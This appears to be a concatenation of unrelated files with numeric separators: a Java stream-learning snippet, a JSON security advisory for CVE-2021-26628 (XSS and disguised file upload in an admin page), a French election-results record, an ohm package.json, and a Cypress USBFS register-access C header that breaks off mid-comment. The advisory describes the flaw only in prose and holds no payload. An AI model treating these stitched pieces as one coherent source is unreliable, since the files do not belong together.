        params.put(BilinearLearnerParameters.BIASINITSTRAT, biasInitStrat);
        // The combined stream
        // Combine both windowed streams, feed each combined context through
        // the incremental learner/evaluator, and report per-window stats.
        ContextStreamCombiner
                .combine(twitterUserWordCountStream, yahooAveragePriceStream)
                .map(
                        new IncrementalLearnerWorldSelectingEvaluator(new SumLossEvaluator(),
                                new IncrementalLearnerFunction(params)))
                .forEach(new Operation<Context>() {
                    @Override
                    public void perform(Context c) {
                        final ModelStats object = c.getTyped("modelstats");
                        System.out.println("Loss: " + object.score);
                        System.out.println("Important words: ");
                        for (final String task : object.importantWords.keySet()) {
                            final Pair<Double> minmax = object.taskWordMinMax.get(task);
                            System.out.printf("... %s (%1.4f->%1.4f) %s\n",
                                    task,
                                    minmax.firstObject(),
                                    minmax.secondObject(),
                                    object.importantWords.get(task)
                            );
                        }
                    }
                });
    }
}
| 2,723
|
892
|
{
"schema_version": "1.2.0",
"id": "GHSA-4hqp-qgvw-892g",
"modified": "2022-05-07T00:01:05Z",
"published": "2022-04-27T00:00:20Z",
"aliases": [
"CVE-2021-26628"
],
"details": "Insufficient script validation of the admin page enables XSS, which causes unauthorized users to steal admin privileges. When uploading file in a specific menu, the verification of the files is insufficient. It allows remote attackers to upload arbitrary files disguising them as image files.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26628"
},
{
"type": "WEB",
"url": "https://www.krcert.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=66673"
}
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"severity": "MODERATE",
"github_reviewed": false
}
}
| 452
|
348
|
<reponame>chamberone/Leaflet.PixiOverlay
{"nom":"Villeparisis","circ":"7ème circonscription","dpt":"Seine-et-Marne","inscrits":14363,"abs":9014,"votants":5349,"blancs":84,"nuls":24,"exp":5241,"res":[{"nuance":"REM","nom":"M. <NAME>","voix":1701},{"nuance":"FN","nom":"Mme <NAME>","voix":912},{"nuance":"FI","nom":"<NAME>","voix":777},{"nuance":"LR","nom":"<NAME>","voix":658},{"nuance":"SOC","nom":"<NAME>","voix":386},{"nuance":"COM","nom":"Mme <NAME>","voix":330},{"nuance":"ECO","nom":"<NAME>","voix":138},{"nuance":"DIV","nom":"M. <NAME>","voix":96},{"nuance":"DVD","nom":"M. <NAME>","voix":91},{"nuance":"DLF","nom":"Mme <NAME>","voix":78},{"nuance":"EXG","nom":"Mme <NAME>","voix":39},{"nuance":"DIV","nom":"<NAME>","voix":27},{"nuance":"DVD","nom":"<NAME>","voix":5},{"nuance":"DIV","nom":"M. <NAME>","voix":3}]}
| 332
|
3,567
|
<reponame>intensifier/ohm
{
"private": true,
"workspaces": [
"packages/cli",
"packages/ohm-js",
"examples/ecmascript",
"examples/es-module",
"examples/markdown",
"examples/operators",
"examples/simple-lisp",
"examples/typescript"
],
"scripts": {
"build": "yarn workspace ohm-js run build",
"ci-test": "yarn build && yarn lint && yarn test",
"format": "prettier --write . && eslint --fix .",
"lint": "eslint .",
"test": "yarn workspaces run test"
},
"devDependencies": {
"eslint": "^7.31.0",
"eslint-config-google": "^0.14.0",
"eslint-plugin-ava": "^12.0.0",
"eslint-plugin-camelcase-ohm": "^0.2.1",
"eslint-plugin-no-extension-in-require": "^0.2.0",
"prettier": "^2.3.2"
}
}
| 363
|
3,897
|
<reponame>mcheah-bose/mbed-os<filename>targets/TARGET_Cypress/TARGET_PSOC6/mtb-pdl-cat1/drivers/include/cy_usbfs_dev_drv_reg.h
/***************************************************************************//**
* \file cy_usbfs_dev_drv_reg.h
* \version 2.20.2
*
* Provides register access API implementation of the USBFS driver.
*
********************************************************************************
* \copyright
* Copyright 2018-2020 Cypress Semiconductor Corporation
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*******************************************************************************/
/** \cond INTERNAL */
/**
* \addtogroup group_usbfs_dev_drv_reg
* \{
*
* Register access API for the USBFS Device block.
*
* This is the API that provides an interface to the USBFS Device hardware.
* These API are intended to be used by the USBFS Device driver to access
* hardware. You can use these API to implement a custom driver based on
* the USBFS Device hardware.
*
* \defgroup group_usbfs_dev_drv_reg_macros Macros
* \{
* \defgroup group_usbfs_dev_drv_reg_macros_hardware Hardware-specific Constants
* \defgroup group_usbfs_dev_drv_reg_macros_sie_intr SIE Interrupt Sources
* \defgroup group_usbfs_dev_drv_reg_macros_sie_mode SIE Endpoint Modes
* \defgroup group_usbfs_dev_drv_reg_macros_arb_ep_intr Arbiter Endpoint Interrupt Sources
* \}
*
* \defgroup group_usbfs_drv_drv_reg_functions Functions
* \{
* \defgroup group_usbfs_drv_drv_reg_interrupt_sources SIE Interrupt Sources Registers Access
* \defgroup group_usbfs_drv_drv_reg_ep0_access Endpoint 0 Registers Access
* \defgroup group_usbfs_drv_drv_reg_sie_access SIE Data Endpoint Registers Access
* \defgroup group_usbfs_drv_drv_reg_arbiter Arbiter Endpoint Registers Access
* \defgroup group_usbfs_drv_drv_reg_arbiter_data Arbiter Endpoint Data Registers Access
* \defgroup group_usbfs_drv_drv_reg_misc Miscellaneous Functions
* \}
*
* \}
*/
#if !defined(CY_USBFS_DEV_DRV_REG_H)
#define CY_USBFS_DEV_DRV_REG_H
#include "cy_device.h"
#if defined (CY_IP_MXUSBFS) && defined (CY_IP_MXPERI)
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include "cy_syslib.h"
#if defined(__cplusplus)
extern "C" {
#endif
/*******************************************************************************
* Hardware-specific Constants
*******************************************************************************/
/**
* \addtogroup group_usbfs_dev_drv_reg_macros_hardware
* \{
*/
/** Number of data endpoints supported by the hardware */
#define CY_USBFS_DEV_DRV_NUM_EPS_MAX (8U)
/** The hardware buffer size used for data endpoint buffers */
#define CY_USBFS_DEV_DRV_HW_BUFFER_SIZE (512U)
/** The hardware buffer for endpoint 0 */
#define CY_USBFS_DEV_DRV_EP0_BUFFER_SIZE (8U)
/** \} group_usbfs_dev_drv_reg_macros_hardware */
/*******************************************************************************
* Functions
*******************************************************************************/
/**
* \addtogroup group_usbfs_drv_drv_reg_interrupt_sources
* \{
*/
/* Access to LPM SIE interrupt sources */
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptStatus(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieInterruptMask (USBFS_Type *base, uint32_t mask);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptMask (USBFS_Type const *base);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptStatusMasked(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieInterrupt (USBFS_Type *base, uint32_t mask);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieInterrupt (USBFS_Type *base, uint32_t mask);
/** \} group_usbfs_drv_drv_reg_interrupt_sources */
/**
* \addtogroup group_usbfs_drv_drv_reg_ep0_access
* \{
*/
/* Access control endpoint CR0.Mode registers */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteEp0Mode(USBFS_Type *base, uint32_t mode);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_ReadEp0Mode(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetEp0Count(USBFS_Type *base, uint32_t count, uint32_t toggle);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetEp0Count(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteEp0Data(USBFS_Type *base, uint32_t idx, uint32_t value);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_ReadEp0Data(USBFS_Type const *base, uint32_t idx);
/** \} group_usbfs_drv_drv_reg_ep0_access */
/**
* \addtogroup group_usbfs_drv_drv_reg_sie_access
* \{
*/
/* Access SIE data endpoints CR0.Mode registers */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpMode (USBFS_Type *base, uint32_t endpoint, uint32_t mode);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpMode (USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpStall (USBFS_Type *base, bool inDirection, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpStall(USBFS_Type *base, uint32_t endpoint, uint32_t mode);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpError (USBFS_Type const *base, uint32_t endpoint);
/* Access SIE data endpoints CNT0 and CNT1 registers */
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpToggle (USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpToggle(USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpCount(USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpCount(USBFS_Type *base, uint32_t endpoint, uint32_t count, uint32_t toggle);
/* Access SIE data endpoints interrupt source registers */
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieAllEpsInterruptStatus(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_EnableSieEpInterrupt (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_DisableSieEpInterrupt(USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpInterrupt (USBFS_Type *base, uint32_t endpoint);
/** \} group_usbfs_drv_drv_reg_sie_access */
/**
* \addtogroup group_usbfs_drv_drv_reg_arbiter
* \{
*/
/* Access Arbiter data endpoints interrupt sources registers */
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbAllEpsInterruptStatus(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_EnableArbEpInterrupt (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_DisableArbEpInterrupt(USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbEpInterruptMask(USBFS_Type *base, uint32_t endpoint, uint32_t mask);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbEpInterruptMask(USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbEpInterruptStatusMasked(USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearArbEpInterrupt(USBFS_Type *base, uint32_t endpoint, uint32_t mask);
/* Access Arbiter data endpoints configuration register */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbEpConfig (USBFS_Type *base, uint32_t endpoint, uint32_t cfg);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbCfgEpInReady (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearArbCfgEpInReady (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_TriggerArbCfgEpDmaReq(USBFS_Type *base, uint32_t endpoint);
/* Access Arbiter data endpoints WA (Write Address and RA(Read Address) registers */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbWriteAddr(USBFS_Type *base, uint32_t endpoint, uint32_t wa);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbReadAddr (USBFS_Type *base, uint32_t endpoint, uint32_t ra);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbWriteAddr(USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbReadAddr (USBFS_Type const *base, uint32_t endpoint);
/** \} group_usbfs_drv_drv_reg_arbiter */
/**
* \addtogroup group_usbfs_drv_drv_reg_arbiter_data
* \{
*/
/* Access data endpoints data registers. Used to get/put data into endpoint buffer */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteData (USBFS_Type *base, uint32_t endpoint, uint8_t byte);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteData16(USBFS_Type *base, uint32_t endpoint, uint16_t halfword);
__STATIC_INLINE uint8_t Cy_USBFS_Dev_Drv_ReadData (USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE uint16_t Cy_USBFS_Dev_Drv_ReadData16 (USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE volatile uint32_t * Cy_USBFS_Dev_Drv_GetDataRegAddr (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE volatile uint32_t * Cy_USBFS_Dev_Drv_GetDataReg16Addr(USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_FlushInBuffer (USBFS_Type *base, uint32_t endpoint);
/** \} group_usbfs_drv_drv_reg_arbiter_data */
/**
* \addtogroup group_usbfs_drv_drv_reg_misc
* \{
*/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetEpType (USBFS_Type *base, bool inDirection, uint32_t endpoint);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSofNubmer(USBFS_Type const *base);
/** \} group_usbfs_drv_drv_reg_misc */
/*******************************************************************************
* API Constants
*******************************************************************************/
/** /cond INTERNAL */
/* Macro to access ODD offset registers: Cypress ID# 299773 */
#define CY_USBFS_DEV_DRV_WRITE_ODD(val) ( (val) | ((uint32_t) (val) << 8U) )
#define CY_USBFS_DEV_READ_ODD(reg) ( (uint32_t) (CY_LO8((reg) | ((reg) >> 8U))) )
/** /endcond */
/**
* \addtogroup group_usbfs_dev_drv_reg_macros_sie_intr
* \{
*/
#define CY_USBFS_DEV_DRV_INTR_SIE_SOF USBFS_USBLPM_INTR_SIE_SOF_INTR_Msk /**< SOF frame detected */
#define CY_USBFS_DEV_DRV_INTR_SIE_BUS_RESET USBFS_USBLPM_INTR_SIE_BUS_RESET_INTR_Msk /**< Bus Reset detected */
#define CY_USBFS_DEV_DRV_INTR_SIE_EP0 USBFS_USBLPM_INTR_SIE_EP0_INTR_Msk /**< EP0 access detected */
#define CY_USBFS_DEV_DRV_INTR_SIE_LPM USBFS_USBLPM_INTR_SIE_LPM_INTR_Msk /**< Link Power Management request detected */
#define CY_USBFS_DEV_DRV_INTR_SIE_RESUME USBFS_USBLPM_INTR_SIE_RESUME_INTR_Msk /**< Resume condition detected */
/** \} group_usbfs_dev_drv_reg_macros_sie_intr */
/**
* \addtogroup group_usbfs_dev_drv_reg_macros_sie_mode
* \{
*/
/* Modes for endpoint 0 (control endpoint) */
#define CY_USBFS_DEV_DRV_EP_CR_DISABLE (0U) /**< Data endpoint disabled */
#define CY_USBFS_DEV_DRV_EP_CR_NAK_INOUT (1U) /**< Data endpoint NAK IN and OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_STALL_INOUT (3U) /**< Data endpoint STALL IN and OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_STATUS_OUT_ONLY (2U) /**< Data endpoint ACK only Status OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_STATUS_IN_ONLY (6U) /**< Data endpoint ACK only Status IN requests */
#define CY_USBFS_DEV_DRV_EP_CR_ACK_OUT_STATUS_IN (11U) /**< Data endpoint ACK only Data and Status OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_ACK_IN_STATUS_OUT (15U) /**< Data endpoint ACK only Data and Status IN requests */
/* Modes for ISO data endpoints */
#define CY_USBFS_DEV_DRV_EP_CR_ISO_OUT (5U) /**< Data endpoint is ISO OUT */
#define CY_USBFS_DEV_DRV_EP_CR_ISO_IN (7U) /**< Data endpoint is ISO IN */
/* Modes for Control/Bulk/Interrupt OUT data endpoints */
#define CY_USBFS_DEV_DRV_EP_CR_NAK_OUT (8U) /**< Data endpoint NAK OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_ACK_OUT (9U) /**< Data endpoint ACK OUT requests */
/* Modes for Control/Bulk/Interrupt IN data endpoints */
#define CY_USBFS_DEV_DRV_EP_CR_NAK_IN (12U) /**< Data endpoint NAK IN requests */
#define CY_USBFS_DEV_DRV_EP_CR_ACK_IN (13U) /**< Data endpoint ACK IN requests */
/** \} group_usbfs_dev_drv_reg_macros_sie_mode */
/**
* \addtogroup group_usbfs_dev_drv_reg_macros_arb_ep_intr ARB_EP_SR/INT_EN 1-8 registers
* \{
*/
/** Data endpoint IN buffer full interrupt source */
#define USBFS_USBDEV_ARB_EP_IN_BUF_FULL_Msk USBFS_USBDEV_ARB_EP1_INT_EN_IN_BUF_FULL_EN_Msk
/** Data endpoint grant interrupt source (DMA complete read/write) */
#define USBFS_USBDEV_ARB_EP_DMA_GNT_Msk USBFS_USBDEV_ARB_EP1_INT_EN_DMA_GNT_EN_Msk
/** Data endpoint overflow interrupt source (applicable only for Automatic DMA mode) */
#define USBFS_USBDEV_ARB_EP_BUF_OVER_Msk USBFS_USBDEV_ARB_EP1_INT_EN_BUF_OVER_EN_Msk
/** Data endpoint underflow interrupt source (applicable only for Automatic DMA mode) */
#define USBFS_USBDEV_ARB_EP_BUF_UNDER_Msk USBFS_USBDEV_ARB_EP1_INT_EN_BUF_UNDER_EN_Msk
/** Endpoint Error in Transaction interrupt source */
#define USBFS_USBDEV_ARB_EP_ERR_Msk USBFS_USBDEV_ARB_EP1_INT_EN_ERR_INT_EN_Msk
/** Data endpoint terminate interrupt source (DMA complete reading) */
#define USBFS_USBDEV_ARB_EP_DMA_TERMIN_Msk USBFS_USBDEV_ARB_EP1_SR_DMA_TERMIN_Msk
/** \} group_usbfs_dev_drv_reg_macros_arb_ep_intr */
/**
* \addtogroup group_usbfs_dev_drv_reg_macros
* \{
*/
/** Data toggle mask in CNT0 register */
#define USBFS_USBDEV_SIE_EP_DATA_TOGGLE_Msk USBFS_USBDEV_SIE_EP1_CNT0_DATA_TOGGLE_Msk
/** \} group_usbfs_dev_drv_reg_macros */
/** /cond INTERNAL */
/* Extended cyip_usbfs.h */
/* Count registers includes CRC size (2 bytes) */
#define CY_USBFS_DEV_DRV_EP_CRC_SIZE (2U)
/* DYN_RECONFIG register */
#define USBFS_USBDEV_DYN_RECONFIG_EN_Msk USBFS_USBDEV_DYN_RECONFIG_DYN_CONFIG_EN_Msk
#define USBFS_USBDEV_DYN_RECONFIG_EPNO_Pos USBFS_USBDEV_DYN_RECONFIG_DYN_RECONFIG_EPNO_Pos
#define USBFS_USBDEV_DYN_RECONFIG_EPNO_Msk USBFS_USBDEV_DYN_RECONFIG_DYN_RECONFIG_EPNO_Msk
#define USBFS_USBDEV_DYN_RECONFIG_RDY_STS_Msk USBFS_USBDEV_DYN_RECONFIG_DYN_RECONFIG_RDY_STS_Msk
/* LPM_CTL register */
#define USBFS_USBLPM_LPM_CTL_LPM_RESP_Pos (USBFS_USBLPM_LPM_CTL_LPM_ACK_RESP_Pos)
#define USBFS_USBLPM_LPM_CTL_LPM_RESP_Msk (USBFS_USBLPM_LPM_CTL_LPM_ACK_RESP_Msk | \
USBFS_USBLPM_LPM_CTL_NYET_EN_Msk)
/* ARB_EP_CFG 1-8 registers (default configuration) */
#define USBFS_USBDEV_ARB_EP_CFG_CRC_BYPASS_Msk      USBFS_USBDEV_ARB_EP1_CFG_CRC_BYPASS_Msk
/* Bug fix: RESET_PTR previously aliased the CRC_BYPASS mask (copy-paste
 * error), so setting the "reset pointer" config bit would actually toggle
 * CRC bypass instead. It must map to the EP1 RESET_PTR mask. */
#define USBFS_USBDEV_ARB_EP_CFG_RESET_PTR_Msk       USBFS_USBDEV_ARB_EP1_CFG_RESET_PTR_Msk
/** /endcond */
/*******************************************************************************
* In-line Function Implementation
*******************************************************************************/
/**
* \addtogroup group_usbfs_drv_drv_reg_interrupt_sources
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieInterruptStatus
****************************************************************************//**
*
* Returns the SIE interrupt request register.
* This register contains the current status of the SIE interrupt sources.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The current status of the SIE interrupt sources.
* Each constant is a bit field value. The value returned may have multiple
* bits set to indicate the current status.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptStatus(USBFS_Type const *base)
{
    /* Raw (unmasked) SIE interrupt request register */
    return USBFS_DEV_LPM_INTR_SIE(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieInterruptMask
****************************************************************************//**
*
* Writes the SIE interrupt mask register.
* This register configures which bits from the SIE interrupt request register
* can trigger an interrupt event.
*
* \param base
* The pointer to the USBFS instance.
*
* \param mask
* Enabled SIE interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieInterruptMask(USBFS_Type *base, uint32_t mask)
{
    /* Overwrites the whole mask register (not a read-modify-write) */
    USBFS_DEV_LPM_INTR_SIE_MASK(base) = mask;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieInterruptMask
****************************************************************************//**
*
* Returns the SIE interrupt mask register.
* This register specifies which bits from the SIE interrupt request register
* can trigger an interrupt event.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* Enabled SIE interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptMask(USBFS_Type const *base)
{
    /* Currently enabled SIE interrupt sources */
    return USBFS_DEV_LPM_INTR_SIE_MASK(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieInterruptStatusMasked
****************************************************************************//**
*
* Returns the SIE interrupt masked request register.
* This register contains a logical AND of corresponding bits from the SIE
* interrupt request and mask registers.
* This function is intended to be used in the interrupt service routine to
* identify which of the enabled SIE interrupt sources caused the interrupt
* event.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The current status of enabled SIE interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptStatusMasked(USBFS_Type const *base)
{
    /* Hardware-computed (request AND mask); intended for use inside the ISR */
    return USBFS_DEV_LPM_INTR_SIE_MASKED(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearSieInterrupt
****************************************************************************//**
*
* Clears the SIE interrupt sources in the interrupt request register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param mask
* The SIE interrupt sources to be cleared.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieInterrupt(USBFS_Type *base, uint32_t mask)
{
    /* Write-1-to-clear the selected interrupt sources */
    USBFS_DEV_LPM_INTR_SIE(base) = mask;
    /* Dummy read-back - presumably flushes the posted write so the clear takes
     * effect before the ISR returns (typical interrupt-clear sequence); keep
     * this read in place. */
    (void) USBFS_DEV_LPM_INTR_SIE(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieInterrupt
****************************************************************************//**
*
* Sets the SIE interrupt sources in the interrupt request register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param mask
* The SIE interrupt sources to be set in the SIE interrupt request register.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieInterrupt(USBFS_Type *base, uint32_t mask)
{
    /* Software-triggers the given SIE interrupt sources via the SET register */
    USBFS_DEV_LPM_INTR_SIE_SET(base) = mask;
}
/** \} group_usbfs_drv_drv_reg_interrupt_sources */
/**
* \addtogroup group_usbfs_drv_drv_reg_ep0_access
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_WriteEp0Mode
****************************************************************************//**
*
* Sets a mode in the CR0 register of endpoint 0 (clears all other bits in the
* register).
*
* \param base
* The pointer to the USBFS instance.
*
* \param mode
* SIE mode defines the data endpoint 0 response to a host request.
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteEp0Mode(USBFS_Type *base, uint32_t mode)
{
    /* Full write: all other CR0 bits are cleared by this assignment */
    USBFS_DEV_EP0_CR(base) = mode;
    /* Dummy read-back - presumably ensures the mode write reached the
     * peripheral before continuing; keep in place. */
    (void) USBFS_DEV_EP0_CR(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ReadEp0Mode
****************************************************************************//**
*
* Returns a mode in the CR0 register of endpoint 0.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* SIE mode (defines the endpoint 0 response to a host request).
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_ReadEp0Mode(USBFS_Type const *base)
{
    /* Returns the raw CR0 register of endpoint 0 */
    return USBFS_DEV_EP0_CR(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetEp0Count
****************************************************************************//**
*
* Configures the number of bytes and toggle bit to return to a host read request
* to endpoint 0.
*
* \param base
* The pointer to the USBFS instance.
*
* \param count
* The number of bytes to return to a host read request.
*
* \param toggle
* The data toggle bit.
* The range of valid values: 0 and \ref USBFS_USBDEV_SIE_EP_DATA_TOGGLE_Msk.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetEp0Count(USBFS_Type *base, uint32_t count, uint32_t toggle)
{
    /* Position the byte count into its field, then combine with the data
     * toggle bit; CNT is an odd-offset register so the special write macro
     * is required. */
    count = _VAL2FLD(USBFS_USBDEV_EP0_CNT_BYTE_COUNT, count);
    USBFS_DEV_EP0_CNT(base) = CY_USBFS_DEV_DRV_WRITE_ODD(count | toggle);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetEp0Count
****************************************************************************//**
*
* Returns the number of data bytes written into endpoint 0 by the host.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The number of bytes written by the host into the endpoint.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetEp0Count(USBFS_Type const *base)
{
    /* CNT is an odd-offset register - use the special read macro */
    uint32_t ep0Cnt = CY_USBFS_DEV_READ_ODD(USBFS_DEV_EP0_CNT(base));
    /* Excludes the CRC size (the SIE counts the 2 appended CRC bytes) */
    return (_FLD2VAL(USBFS_USBDEV_EP0_CNT_BYTE_COUNT, ep0Cnt) - CY_USBFS_DEV_DRV_EP_CRC_SIZE);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_WriteEp0Data
****************************************************************************//**
*
* Writes an 8-bit byte into the endpoint 0 hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param idx
* The index of the endpoint 0 hardware buffer entry.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_EP0_BUFFER_SIZE - 1 ).
*
* \param value
* The value to be written into the endpoint 0 hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteEp0Data(USBFS_Type *base, uint32_t idx, uint32_t value)
{
    /* Odd-offset hardware buffer registers require the special odd-write
     * access macro; even offsets are written directly. */
    bool oddOffset = (0U != (idx & 0x1U));

    USBFS_DEV_EP0_DR(base, idx) = oddOffset ? CY_USBFS_DEV_DRV_WRITE_ODD(value) : value;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ReadEp0Data
****************************************************************************//**
*
* Reads an 8-bit byte from the endpoint 0 hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param idx
* The index of the endpoint 0 hardware buffer entry.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_EP0_BUFFER_SIZE - 1 ).
*
* \return
* The byte of data to read from the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_ReadEp0Data(USBFS_Type const *base, uint32_t idx)
{
    /* Odd-offset hardware buffer registers require the special odd-read
     * access macro; even offsets are read directly. Only the selected
     * branch of the conditional performs a register access. */
    return (0U != (idx & 0x1U))
           ? CY_USBFS_DEV_READ_ODD(USBFS_DEV_EP0_DR(base, idx))
           : USBFS_DEV_EP0_DR(base, idx);
}
/** \} group_usbfs_drv_drv_reg_ep0_access */
/**
* \addtogroup group_usbfs_drv_drv_reg_sie_access
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieEpMode
****************************************************************************//**
*
* Sets SIE mode in the CR0 register of the endpoint (does not touch other bits).
* All other bits except NAK_INT_EN are cleared by the hardware on any write
* in the register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param mode
